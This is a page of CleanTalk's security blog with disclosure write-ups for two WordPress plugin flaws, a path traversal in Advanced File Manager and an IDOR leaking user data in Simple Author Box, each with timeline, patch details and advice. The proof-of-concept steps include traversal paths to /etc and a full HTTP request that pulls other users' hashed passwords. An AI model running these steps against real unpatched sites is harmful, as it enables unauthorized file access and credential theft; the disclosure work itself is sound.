CleanTalk's blog

    Sign up

    Category: Security issues

    • CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

      CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

      In the realm of WordPress plugins, a severe security vulnerability has been unveiled. A comprehensive testing process revealed a critical flaw within the Advanced File Manager plugin, specifically versions up to 5.1.1. This vulnerability exposes a significant security lapse that can potentially allow unauthorized access to files and folders through Path Traversal techniques.

      Main info:

      CVECVE-2023-3814
      PluginAdvanced File Manager
      CriticalHigh
      Publicly PublishedAugust 14, 2023
      Last UpdatedAugust 14, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A5: Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814
      https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
      Plugin Security Certification by CleanTalk

      Timeline

      July 13, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
      July 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      August 9, 2023The author has released a fix update
      August 14, 2023Registered CVE-2023-3814

      Discovery of the Vulnerability

      During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

      Understanding of Path Traversal attack’s

      Path Traversal is a hacking technique that involves manipulating file paths to access files and directories beyond the intended scope. Hackers can exploit this vulnerability to break out of the restricted directory and gain access to sensitive files and directories residing in other parts of the system. Path Traversal OWASP TOP-10

      Exploiting the Path Traversal vulnerability

      Exploiting this Path Traversal vulnerability within the Advanced File Manager plugin could empower attackers to change the root folder, allowing them to view, access, and potentially download files from locations that are off-limits under normal circumstances.

      POC:

      1. Go to settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

      2. In the “Public Root Path” setting, change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

      3. Then navigate to the page of plugin (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

      4. You will be able to list the files/folders outside of WordPress root directory

      Potential Risks and Real-World Impact

      The Path Traversal vulnerability within the Advanced File Manager plugin introduces grave risks and potential scenarios:

      1. Data Exposure:
        Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
      2. Malicious Code Injection to OS folder’s:
        By manipulating file paths, hackers may insert malicious code into system files, leading to the compromise of the entire website.
      3. Escalation of Privileges:
        Exploiting this vulnerability could provide attackers with unauthorized administrative access, leading to unauthorized control and manipulation of the WordPress environment.

      Recommendations for Improved Security

      To fortify your WordPress website against the CVE-2023-3814 vulnerability and enhance overall security, consider implementing the following preventive measures:

      • Immediate Plugin Update:
        Upgrade to Advanced File Manager plugin version 5.1.2 or higher. This update addresses the Path Traversal vulnerability and strengthens security.
      • Input Validation:
        Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Awareness:
        Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.

      By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

      #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

      Use CleanTalk solutions to improve the security of your website

      Dmitrii i.

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.

      Main info:

      CVECVE-2023-3601
      PluginSimple Author Box
      CriticalVery High
      Publicly PublishedJuly 24, 2023
      Last UpdatedJuly 24, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A01:2021-Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
      https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
      Plugin Security Certification by CleanTalk

      Timeline

      July 5, 2023Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
      July 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 16, 2023The author has eliminated the vulnerability and patched his plugin
      July 24, 2023Registered CVE

      Discovery of the Vulnerability

      During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601) , specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.

      Understanding Insecure Direct Object Reference (IDOR)

      Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

      Exploiting the IDOR Vulnerability

      In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).

      POC:

      1. Create a new Post as a Contributor user.

      2. Add the “Simple Author Box” block.

      3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

      4. Inspect the response to see all of the information about that user, including the hashed password.

      POC request:

      POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
      Host: your_site_here
      User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: /
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://your_site_here/wordpress/wp-admin/post-new.php
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 50
      Origin: http://your_site_here
      Connection: close
      Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
      Sec-Fetch-Dest: empty
      Sec-Fetch-Mode: cors
      Sec-Fetch-Site: same-origin

      action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7

      Potential Risks and Real-World Impact

      The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:

      1. Unauthorized Data Exposure:
        Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
      2. Credential Compromise:
        Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
      3. Identity Impersonation:
        The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

      Recommendations for Improved Security

      To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

      • Immediate Plugin Update:
        The developers of Simple Author Box should release a patched version that addresses the IDOR vulnerability. Website administrators should promptly update to the latest secure version to prevent exploitation.
      • Security Best Practices:
        Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Privilege Restriction:
        Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
      • User Awareness:
        Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

      By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.

      Use CleanTalk solutions to improve the security of your website

      Dmitrii ignatyev

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • Security vulnerability in Anti-Spam by CleanTalk for WordPress prior 6.11

      Security vulnerability in Anti-Spam by CleanTalk for WordPress prior 6.11

      We have fixed a security vulnerability in Anti-Spam by CleanTalk for WordPress. The vulnerability in the plugin can still be exploited in versions till 6.11. You can see the changelog here.

      You can check the current version of the plugin in the list of your installed plugins.

      WordPress Console -> Plugins

      In case you use one of these previous versions, please be sure to update the plugin to the latest stable version as soon as you read this post using our special guide.

    CleanTalk

    About

    Dashboard

    Pricing

    Sign up / Sign in

    Solutions

    Anti-Spam service overview

    Block Lists

    Filter fake emails

    Hide contact data

    Stop spam emails in Contact form 7 (CF7)

    Stop spam in Elementor form builder

    Stop spam in WPForms

    Website malware scanner

    Malware removal service

    WordPress Security & Firewall Plugin

    Documentation

    Anti-Spam API

    Help

    License agreement

    Privacy Policy

    Refund Policy

    Signs of Malware

    Contact us

    Create a support ticket

    Telegram

    Contact us